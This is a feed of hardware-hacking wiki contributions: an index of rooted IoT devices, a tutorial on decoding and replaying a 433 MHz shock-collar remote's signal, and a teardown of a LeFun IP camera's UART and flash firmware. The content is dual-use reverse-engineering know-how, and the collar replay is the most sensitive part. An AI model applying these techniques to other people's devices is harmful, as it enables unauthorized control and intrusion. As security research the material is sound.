Exploitee.rs - User contributions [en]

File:Collar protocol packet.PNG

2018-08-21T03:28:50Z

Rjmendez: Rjmendez uploaded a new version of "File:Collar protocol packet.PNG"

Main Page/Devices

2017-12-12T17:45:48Z

Rjmendez:

{| style="border: 0px solid #000000; cell-padding:0px; cell-spacing:0px;"
| valign="top"|
{| style="border: 1px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"
|+'''INTERNET OF THINGS'''
| valign="top"|
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"
|+ style="text-align: left; padding-left:15px;"|'''BLU-RAY PLAYERS'''
| style="border-top: 0px solid #000000;"|[[File:Sony-bdp-s5100-multi-region-blu-ray-dvd-player.jpg|80px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Sony BDP-S5100'''
*[[Sony BDP-S5100]]
|-
| style="border-top: 0px solid #000000;"|[[File:LG_BP350.JPG|130px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''LG Blu-Ray'''
*[[LG BP350]]
*[[LG BP530]]
|-
| style="border-top: 0px solid #000000;"|[[File:Panasonic-DMP-BDT230.jpg|80px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Panasonic Blu-Ray'''
*[[DMP-BDT230]]
*[[DMP-BD871]]
|}
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"
|+ style="text-align: left; padding-left:15px;"|'''CAMERAS'''
| style="border-top: 0px solid #000000;"|[[File:Alarm.com_ADC-v520IR.jpg|70px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Alarm.com v520IR'''
*[[Alarm.com ADC-v520IR]]
|-
| style="border-top: 0px solid #000000;"|[[File:DLINK_936L.jpg|70px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''DLink 936L'''
*[[DLink 936L]]
|-
| style="border-top: 0px solid #000000;"|[[File:Cloudipcam_store.png|70px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''LeFun Cloud IPCam'''
*[[LeFun Cloud IPCam]]
|-
| style="border-top: 0px solid #000000;"|[[File:Ring-doorbell.jpg|35px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Ring Doorbell'''
*[[Ring Doorbell]]
|-
| style="border-top: 0px solid #000000;"|[[File:Samsung-SDR3102N.jpg|75px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Samsung SDR-3102N'''
*[[Samsung SDR-3102N]]
|-
| style="border-top: 0px solid #000000;"|[[File:Samsung-smartcam.jpg|75px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Samsung SmartCam'''
*[[Samsung SmartCam]]
|-
| style="border-top: 0px solid #000000;"|[[File:Summer_Baby_Zoom_WiFi.jpg|75px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Summer Baby Zoom WiFi'''
*[[Summer Baby Zoom WiFi]]
|-
| style="border-top: 0px solid #000000;"|[[File:Zmodo greet.JPG|35px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Zmodo Greet'''
*[[Zmodo Greet]]
|}
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"
|+ style="text-align: left; padding-left:15px;"|'''HOME AUTOMATION'''
| style="border-top: 0px solid #000000;"|[[File:BelkinWemo.png|80px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Belkin Wemo'''
*[[Belkin Wemo]]
|-
| style="border-top: 0px solid #000000;"|[[File:GreenwaveRealityTCPConnectedHub.jpg|80px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Greenwave Reality Bulbs'''
*[[Greenwave Reality Bulbs]]
|-
| style="border-top: 0px solid #000000;"|[[File:Lutron LBDG2WH Caseta Smart Home Stock.jpg|60px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Lutron L-BDG2-WH Caseta Smart Bridge '''
*[[Lutron L-BDG2-WH Caseta Smart Bridge]]
|-
| style="border-top: 0px solid #000000;"|[[File:Staples_Connect_Hub.jpg|80px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Staples Connect Hub'''
*[[Staples Connect Hub]]
|-
| style="border-top: 0px solid #000000;"|[[File:WinkHub.jpg|80px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Wink Hub'''
*[[Wink Hub]]
|}
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"
|+ style="text-align: left; padding-left:15px;"|'''MEDIA PLAYERS'''
| style="border-top: 0px solid #000000;"|[[File:FireTVStickStockPhoto.jpg|70px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Amazon Fire TV Stick'''
*[[Amazon Fire TV Stick]]
|-
| style="border-top: 0px solid #000000;"| [[File:AmazonFireTV.jpg|100px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Amazon FireTV'''
*[[Amazon FireTV]]
|-
| style="border-top: 0px solid #000000;"|[[File:VizioCoStarLT.jpg|70px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Vizio CoStar LT (ISV-B11)'''
*[[Vizio CoStar LT (ISV-B11)]]
|-
| style="border-top: 0px solid #000000;"|[[File:NetgearPush2TV.jpg|70px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Netgear Push2TV (PTV3000)'''
*[[Netgear Push2TV (PTV3000)]]
|}
|}
| valign="top"|
{| style="border: 1px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;" valign="top"
|+'''INTERNET OF THINGS (Cont)'''
| valign="top"|
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"
| style="border-top: 0px solid #000000;"|[[File:NetgearNeoTV.jpg|70px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Netgear NTV200-100NAS'''
*[[Netgear NTV200-100NAS]]
|-
| style="border-top: 0px solid #000000;"|[[File:Front-SMALL.jpg|100px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Boxee Box'''
*[[Boxee]]
|-
| style="border-top: 0px solid #000000;"|[[File:Chromecast-stock.jpg|70px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Google Chromecast'''
*[[Google Chromecast]]
*[http://forum.exploitee.rs/google-chromecast-f48 Chromecast forum ]
|-
| style="border-top: 0px solid #000000;"|[[File:Roku-pile.jpg|100px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Roku Streaming Players'''
*[[Roku]]
|-
| style="border-top: 0px solid #000000;"|[[File:Allsharecast.jpg|70px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Samsung Allshare Cast'''
*[[Samsung Allshare Cast]]
|-
| style="border-top: 0px solid #000000;"|[[File:Steam_Link_Stock.png|80px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Steam Link'''
*[[Steam Link]]
|-
| style="border-top: 0px solid #000000;"|[[File:Vudu Spark Stock Photo.jpeg|70px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Vudu Spark'''
*[[Vudu Spark]]
|}
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"
|+ style="text-align: left; padding-left:15px;"|'''MOBILE'''
| style="border-top: 0px solid #000000;"|[[File:Razr.png|40px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Moto LTE RAZR, BIONIC, & DROID 4'''
*[[Moto RAZR, BIONIC, DROID 4]]
|}
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"
|+ style="text-align: left; padding-left:15px;"|'''MUSIC PLAYERS'''
| style="border-top: 0px solid #000000;"|[[File:ALURATEK_WIFI_RADIO.JPG|80px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Aluratek WiFi Radio'''
*[[Aluratek WiFi Radio]]
|-
| style="border-top: 0px solid #000000;"|[[File:Amazon Tap Stock Photo.jpg|60px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Amazon Tap'''
*[[Amazon Tap]]
|}
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"
|+ style="text-align: left; padding-left:15px;"|'''NETWORK ATTACHED STORAGE'''
| style="border-top: 0px solid #000000;"|[[File:ConnectedDataFileTransporter.jpg|80px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Connected Data Transporter'''
*[[Connected Data Transporter]]
|-
| style="border-top: 0px solid #000000;"|[[File:Pogoplug-mobile.jpg|80px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''PogoPlug Mobile'''
*[[PogoPlug Mobile]]
|-
| style="border-top: 0px solid #000000;"|[[File:Qnap TS131.jpg|60px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''QNAP TurboStation'''
*[[QNAP TS-131]]
|-
| style="border-top: 0px solid #000000;"|[[File:Wd_stock_photo.jpg|60px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Western Digital MyCloud'''
*[[Western Digital MyCloud]]
|}
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"
|+ style="text-align: left; padding-left:15px;"|'''PRINTERS'''
| style="border-top: 0px solid #000000;"|[[File:EpsonArtisan700.jpg|80px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Epson Artisan 700/800'''
*[[Epson Artisan 700/800]]
|}
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"
|+ style="text-align: left; padding-left:15px;"|'''REFRIGERATOR'''
| style="border-top: 0px solid #000000;"|[[File:LFX31995ST.jpg|80px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''LG Smart Refrigerator (LFX31995ST)'''
*[[LG Smart Refrigerator (LFX31995ST)]]
|}
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"
|+ style="text-align: left; padding-left:15px;"|'''TELEVISIONS'''
| style="border-top: 0px solid #000000;"|[[File:HisenseAndroidTV.jpg|80px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Hisense Android TV'''
*[[Hisense Android TV]]
|-
| style="border-top: 0px solid #000000;"|[[File:Vizio_SmartTV_VF553XVT.png|80px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Vizio Smart TV (VF553XVT)'''
*[[Vizio Smart TV (VF553XVT)]]
|}
{| style="border: 0px solid #000000; width:280px; cell-padding:0px; cell-spacing:0px;"
|+ style="text-align: left; padding-left:15px;"|'''THERMOSTATS'''
| style="border-top: 0px solid #000000;"|[[File:Nest.jpg|80px]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Google Nest'''
*[[Nest]]
*[http://forum.exploitee.rs/google-nest-f50/ Google Nest Forum ]
*[[Exploiting Nest Thermostats]]
|}
|}
| valign="top"|
{| style="border: 1px solid #000000; cell-padding:0px; cell-spacing:0px; width:300px" valign="top"
|+'''INTERNET OF THINGS (Cont)'''
| valign="top"|
{| style="border: 0px solid #000000; width:300px; cell-padding:0px; cell-spacing:0px;"
|+ style="text-align: left; padding-left:15px;"|'''VOIP'''
| style="border-top: 0px solid #000000;"|[[File:Ooma_Telo.jpg|80px]]
| valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Ooma Telo'''
*[[Ooma Telo]]
|}
|}
{| style="border: 1px solid #000000; cell-padding:0px; cell-spacing:0px; width:300px" valign="top"
|+'''Medical'''
| style="border-top: 0px solid #000000;"| [[File:Merlin-at-home-1.jpg|75px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''SJM Merlin at Home'''
*[[SJM Merlin at Home]]
|}
{| style="border: 1px solid #000000; cell-padding:0px; cell-spacing:0px; width:300px" valign="top"
|+'''Networking'''
| style="border-top: 0px solid #000000;"| [[File:BELKIN_N300.JPG|50px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Belkin N300'''
*[[Belkin N300]]
|-
| style="border-top: 0px solid #000000;"| [[File:Google_OnHub.jpg|50px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Google (TP-Link)'''
*[[Google OnHub (TP-Link)]]
*[https://forum.exploitee.rs/viewforum.php?f=58 Google OnHub Forum ]
|-
| style="border-top: 0px solid #000000;"| [[File:ASUS-Google-OnHub.jpg|75px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Google (ASUS)'''
*[[Asus OnHub]]
*[https://forum.exploitee.rs/viewforum.php?f=58 Google OnHub Forum ]
|-
| style="border-top: 0px solid #000000;"| [[File:LINKSYS_WRT1200AC.JPG|75px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Linksys WRT1200AC'''
*[[Linksys WRT1200AC]]
|-
| style="border-top: 0px solid #000000;"| [[File:NETGEAR_WN3000RP.JPG|50px|center]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Netgear WN3000RP'''
*[[Netgear WN3000RP]]
|}
{| style="border: 1px solid #000000; cell-padding:0px; cell-spacing:0px; width:300px" valign="top"
|+'''Android TV'''
| style="border-top: 0px solid #000000;"| [[File:Android_TV.jpg|100px]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''ADT-1'''
*[[ADT-1 Android TV]]
*[https://forum.exploitee.rs/adt-f52/ ADT-1 Forum ]
|-
| style="border-top: 0px solid #000000;"|[[File:Google-Nexus-Player-Stock.jpg|100px]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Nexus Player'''
*[[Google Nexus Player]]
*[https://forum.exploitee.rs/nexus-player-f54/ Google Nexus Player Forum ]
|}
{| style="border: 1px solid #000000; cell-padding:0px; cell-spacing:0px; width:300px;" valign="top"
|+'''SECOND GENERATION GOOGLETV'''
| style="border-top: 0px solid #000000;"|[[File:Asus_cube.jpg|100px]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Asus Cube'''
*[[Asus Cube]]
*[http://forum.exploitee.rs/cube-f46/ Asus Cube Forum ]
|-
| style="border-top: 0px solid #000000;"|[[File:Neotv-prime.jpg|100px]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Netgear NeoTV Prime'''
*[[Netgear NeoTV Prime]]
*[http://forum.exploitee.rs/neotv-prime-gtv100-f44/ Negear NeoTV Prime Forum ]
|-
| style="border-top: 0px solid #000000;"|[[File:Hisense pulse stock.jpg|100px]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Hisense Pulse'''
*[[Hisense Pulse]]
*[http://forum.exploitee.rs/pulse-gx1200v-f42/ Hisense Pulse Forum ]
|-
| style="border-top: 0px solid #000000;"|[[File:180px-NSZ-GS7.jpg|100px]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Sony NSZ-GS7'''
*[[Sony NSZ-GS7 (Streamer)]]
*[http://forum.exploitee.rs/nsz-gs7-streamer/ NSZ-GS7 Forum ]
|-
| style="border-top: 0px solid #000000;"|[[File:Costar01.jpg|100px]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Vizio Co-Star'''
*[[Vizio Co-Star]]
*[http://forum.exploitee.rs/star-vap430-f40/ Co-Star Forum ]
|-
| [[File:180px-LG_G2.jpg|150px]]
| colspan="2" valign="top" style="text-align: left;"|
'''LG 47G2/55G2'''
*[[LG 47G2/55G2 (Internet TV)]]
*[http://forum.exploitee.rs/47g2-55g2-internet-f36/ LG devices forum ]
|}
| valign="top"|
{| style="border: 1px solid #000000; cell-padding:0px; cell-spacing:0px; width:300px"
|+'''FIRST GENERATION GOOGLETV'''
| style="border-top: 0px solid #000000;"| [[File:180px-revue.jpg|100px]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Logitech Revue'''
*[[Revue software root]]
*[[Logitech Revue UART root]]
*[http://forum.exploitee.rs/revue/ Revue forum ]
*[http://exploitee.rs/index.php/Category:Logitech_Revue Info on Logitech Revue]
|-
| style="border-top: 0px solid #000000;"|[[File:180px-Sony_NSZ_GT1_NSX_40GT1.jpg|100px]]
| colspan="2" valign="top" style="text-align: left; border-top: 0px solid #000000;"|
'''Sony NSZ-GT1'''
*[[Sony NSZ-GT1 (Bluray Player)]]
*[http://forum.exploitee.rs/nsz-gt1/ NSZ-GT1 Forum ]
'''Sony NSX-##GT1'''
*[[Sony NSX-40GT1 (Internet TV)]]
*[http://forum.exploitee.rs/nsx-40gt1/ NSX-40GT1 Forum ]
''' Sony Generic'''
*[[Sony Bootloader HW Root]]
*[[Sony Unsigned Kernels (SW Root)]]
*[[Sony SATA HW Root]]
*[[I've rooted... now what?!]]
|}
{| style="border: 1px solid #000000; width:300px; cell-padding:0px; cell-spacing:0px;"
|+'''Exploitee.rs Hardware'''
| style="border-top: 0px solid #000000;width:180px; padding-left:25%;"|
*[[Exploitee.rs Low Voltage e-MMC Adapter]]
|}
{| style="border: 1px solid #000000; width:300px; cell-padding:0px; cell-spacing:0px;"
|+'''Generic Info'''
| style="border-top: 0px solid #000000;width:180px; padding-left:25%;"|
*[[All_device_feature_matrix|All Device Feature Matrix]]
*[[Exploiting Key Signing for Root]]
*[[Installing Custom Recovery (Gen 2 Only)]]
*[[RF_Signal_Analysis|RF Signal Analysis]]
|}
{| style="border: 1px solid #000000; width:300px; cell-padding:0px; cell-spacing:0px;"
|+'''Presentation Slides'''
| style="border-top: 0px solid #000000;width:180px; padding-left:25%;"|
*[https://download.exploitee.rs/file/generic/GTVHacker-DEFCON20.pdf DEF CON 20 - "Hacking The Google TV"]
*[https://download.exploitee.rs/file/generic/GTVHacker-DEFCON21.pdf DEF CON 21 - "Google TV Or: How I Learned to Stop Worrying and Exploit Secure Boot"]
*[https://download.exploitee.rs/file/generic/GTVHacker-DEFCON22.pdf DEF CON 22 - "Hack All The Things: 20 Devices in 45 Minutes"]
*[https://download.exploitee.rs/file/generic/BH2017-Hacking-Hardware-With-A-10-Reader.pdf BlackHat 2017 - "Hacking Hardware with a $10 SD Card Reader"]
*[https://download.exploitee.rs/file/generic/Exploiteers-DEFCON25.pdf DEFCON 25 - "All Your Things Are Belong To Us"]
|}
{| style="border: 1px solid #000000; width:300px; cell-padding:0px; cell-spacing:0px;"
|+'''Whitepapers'''
| style="border-top: 0px solid #000000;width:180px; padding-left:25%;"|
*[https://download.exploitee.rs/file/generic/BH2017-Hacking-Hardware-With-A-10-Reader-wp.pdf "Hacking Hardware with a $10 SD Card Reader"]
|}
|}

RF Signal Analysis

2017-10-18T20:50:12Z

Rjmendez: /* Sending our own data */

This page will be to cover some basic RF signal analysis.

== About ==
Many IoT devices use < 1Ghz signaling for various functions (various sensors, remote controls, device to device communication) with an undocumented and sometimes proprietary protocol. It can often be difficult to understand these without documentation and the aim here is to provide some of the first steps needed to identify and decode some of the data. The hardware used in this demo will be:

A HackRF from Great Scott Gadgets. (https://greatscottgadgets.com/hackrf/)

An RTL-SDR dongle from the rtl-sdr blog that is for sale on amazon. (http://www.rtl-sdr.com/buy-rtl-sdr-dvb-t-dongles/)

Another device from Great Scott Gadgets, the YARD Stick One. (https://greatscottgadgets.com/yardstickone/)

== Where to look ==

One great place to start is with the FCC documentation for the transmitting device, if the device has an fccid then it will have information on file. Some good reference links are below.

Awesome US spectrum allocation graphic: https://upload.wikimedia.org/wikipedia/commons/d/df/United_States_Frequency_Allocations_Chart_2011_-_The_Radio_Spectrum.pdf

Wikipedia page on ISM bands: https://en.wikipedia.org/wiki/ISM_band

Our demo device right now will be an alarm remote control with the fccid "B4Z-RF400401" that does not have the frequency listed on the package.

[[File:Remote.jpg|300px]]

We can throw this ID into the https://fccid.io/ site to get some details.

https://fccid.io/B4Z-RF4004-01-2

[[File:B4Z-RF400401_fccid.io.PNG|300px]]

Now we know where this device is supposed to be transmitting and we can move on to the next steps.

== How to look ==

Some favorites are gqrx (linux and mac http://gqrx.dk/) or sdr# (windows http://airspy.com/download/ ) in a higher sample rate mode to inspect the entire band the device operates on to look for the signal. For the rest of the demo I will be using another device with no FCC id. It advertises that it operates at 433mhz. I will be capturing with the RTL-SDR dongle.

[[File:Shock_Collar.jpg|300px]]

{{#ev:youtube|NI8U1IfQyto}}

I know where to look for the signal now but the wave form isn't showing me very much. Listening to the demodulated audio does tell me something however, this sounds like Amplitude Shift Keying (ASK) also known as On Off Keying (OOK). Lets verify this with gnuradio and gr-fosphor over the hackrf for a bit higher quality signal.

[[File:Inspect_ook_grc.png|500px]]
[[File:Inspect_ook_gr-fosphor.png|500px]]

This absolutely looks like OOK.

Useful link to the Signal Identification Guide wiki: http://www.sigidwiki.com/wiki/Signal_Identification_Guide

== Decoding ==

Our next task will be to determine the data rate, a favorite tool is Inspectrum (https://github.com/miek/inspectrum).

[[File:Inspectrum_ook.png|500px]]

We can see the definite bits here and get a general idea about the baud rate, it looks like it is above 3500 baud but we can refine this! Another useful tool is Universal Radio Hacker (https://github.com/sthysel/urh) that can take a bunch of the work out of demodulating and decoding a signal.

[[File:URH_waveform_demod.png|500px]]

Knowing the approximate baud rate and our sample rate of 2 million samples per second we can start to fiddle with the bit length and noise level to decode the packets. Things start to settle out at 500 samples per bit. This would give us a baud rate of 4000, this isn't accurate because of the rest of the tinkering but it will let us decode the signal. More careful adjustment will get us closer to the actual rate of 555 samples per second or 3600 baud. At this point we can retransmit these bits with the hackrf and trigger the device but it doesn't give us a clear of an idea what is actually going on.

The pattern of bits look like there is some error correction built in, a sequence of 1000 seems to equal 0 and 1110 equals a 1. URH will let us decode this further as seen below.

[[File:URH_NRZ_replace.png|500px]]

The resulting packets now look like this.

[[File:Decoded_packets.png]]

If we ignore the noise on 5 and 10 we can see a sequence forming. This sequence is the result of changing the power level setting on the remote control. With more changes and monitoring the entire protocol can be decoded.

[[File:Collar_protocol_packet.PNG|500px]]

== Sending our own data ==

With this data we can now use a tool like the YARD Stick One to transmit our own packets to the device. I have posted the complete code here. https://github.com/rjmendez/ShockCollar

LeFun Cloud IPCam

2017-08-09T19:22:22Z

Rjmendez:

__FORCETOC__
{{Disclaimer}}
[[File:Cloudipcam_store.png|100px|left|thumb]]
[[Category:Cameras]]
This page will be dedicated to a general overview, descriptions, and information related to the LeFun C1 wireless surveillance camera.

== About ==
The LeFun C1 wireless surveillance camera is a network (Wifi/Ethernet) camera w/ IR LEDs provided by LeFun and available on Amazon.com.

<gallery>
File:Cloudipcam_front.jpg
File:Cloudipcam_profile.jpg
File:Cloudipcam_back.jpg
</gallery>

== Disassembly ==
The base of the camera is attached with four small phillips screws hidden under silicone rubber feet. Remove all four, the base and board should be open to you.

<gallery>
File:Cloudipcam_bottom.jpg
File:Cloudipcam_board.jpg
</gallery>

== UART ==
A Login Console is presented on UART (3.3v) at 38400 baud. The pinout for UART can be found below.

<gallery>
File:Cloudipcam_UART_pins.jpg
</gallery>

== Exploitation ==

U-Boot is available on boot and can probably be init hijacked, thankfully there is a better option that does not require access to the internals.

[[File:Cloudipcam_mxic25l12835f.jpg|100px|thumb]]

The firmware on this model was not available for download elsewhere and I didn't feel like waiting on the firmware to download over the uart at 38.4k baud so we will resort to the hot air and minipro TL866CS. SPI flash model mxic25l12835f was removed and dumped, the issue I had was that from 0x0 to 0xC00000 every 4 bytes were swapped.

'''Firmware Format'''

Raw data from the chip has an interesting patern to it.

From U-Boot

<pre>=> md.b 0x02000000 130
02000000: 47 4d 38 31 32 36 00 00 00 00 01 00 00 00 01 00 GM8126..........
02000010: 00 00 0b 00 00 00 0d 00 00 00 00 00 00 00 00 00 ................
02000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
02000030: 00 00 00 00 08 00 00 00 0c 00 00 00 18 00 00 00 ................
02000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
02000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
02000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
02000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
02000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
02000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
020000a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
020000b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
020000c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
020000d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
020000e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
020000f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa ..............U.
02000100: fa f8 bb f0 ba ba e7 70 5a be 03 aa 0a ea ae ba .......pZ.......
02000110: 22 f3 7a ff ba 2d 08 aa f7 aa 2a 3c fa bb aa 9e ".z..-....*<....
02000120: 80 2e ea fd b9 ea c2 b5 ec ab 6a ba 8f aa ba ab ..........j.....</pre>

Dumped from the chip.

<pre>rjmendez@Rjmendez:~/cloudipcamera$ hd cloudipcamera_mxic25l12835f.BIN | head -n 15
00000000 31 38 4d 47 00 00 36 32 00 01 00 00 00 01 00 00 |18MG..62........|
00000010 00 0b 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 |................|
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000030 00 00 00 00 00 00 00 08 00 00 00 0c 00 00 00 18 |................|
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
000000f0 00 00 00 00 00 00 00 00 00 00 00 00 aa 55 00 00 |.............U..|
00000100 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
*
00001000 80 5a 47 4d 00 00 00 00 00 00 29 18 00 00 00 00 |.ZGM......).....|
00001010 6f 62 73 6e 62 2e 74 6f 00 00 6e 69 00 00 00 00 |obsnb.to..ni....|
00001020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00001100 ea 00 00 0e e5 9f f0 14 e5 9f f0 14 e5 9f f0 14 |................|
00001110 e5 9f f0 14 e1 a0 00 00 e5 9f f0 10 e5 9f f0 10 |................|</pre>

Lets reorder the bytes.

<pre>objcopy -I binary -O binary --reverse-bytes=4 cloudipcamera_mxic25l12835f.BIN cloudipcamera_mxic25l12835f.BIN.swapped</pre>

Merging the two halves together gives us the entire image.

<pre>rjmendez@Rjmendez:~/cloudipcamera$ binwalk cloudipcamera_mxic25l12835f.BIN.merged

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
809008 0xC5830 CRC32 polynomial table, little endian
852224 0xD0100 Linux kernel ARM boot executable zImage (little-endian)
865293 0xD340D gzip compressed data, maximum compression, from Unix, last modified: 2015-10-23 07:16:16
12582912 0xC00000 JFFS2 filesystem, little endian</pre>

'''Filesystem'''

The notable data includes the root filesystem.

<pre>rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls
D340D D8B3E4 D8BA40 D8BF44 D8CE50 DC11AC DC15E4 DC1AF4 E7C814 E7CC44 ED5158 ED565C ED5BAC FB50C0 FFE67C jffs2-root-1 jffs2-root-3 jffs2-root-8
_D340D.extracted D8B514 D8BC0C D8C670 D8CEFC DC12AC DC16E8 DC1BC0 E7C90C E7CD44 ED5324 ED5754 ED5CD8 FB51EC FFEAB0 jffs2-root-10 jffs2-root-4 jffs2-root-9
D8B0BC D8B640 D8BD04 D8CBC4 D8D4E8 DC1340 DC180C E7C050 E7CA0C E7CE48 ED541C ED5854 ED5D64 FB5278 FFEDFC jffs2-root-11 jffs2-root-5
D8B1BC D8B6CC D8BE04 D8CCBC D8E460 DC13EC DC193C E7C198 E7CAA0 E7CF6C ED551C ED5958 ED5E30 FB5344 jffs2-root jffs2-root-12 jffs2-root-6
D8B2C0 D8B938 D8BE98 D8CDBC DC10B4 DC14E4 DC1A68 E7C5B0 E7CB4C ED5050 ED55B0 ED5A7C ED5F38 FFE230 jffs2-root-0 jffs2-root-2 jffs2-root-7
rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls _D340D.extracted/
1A100 _1A100.extracted 9FD828
rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls _D340D.extracted/_1A100.extracted/
168.cpio cpio-root
rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls _D340D.extracted/_1A100.extracted/cpio-root/
bin dev etc init lib mnt proc project root sbin sys tmp usr var
rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls _D340D.extracted/_1A100.extracted/cpio-root/root/
welcome.txt
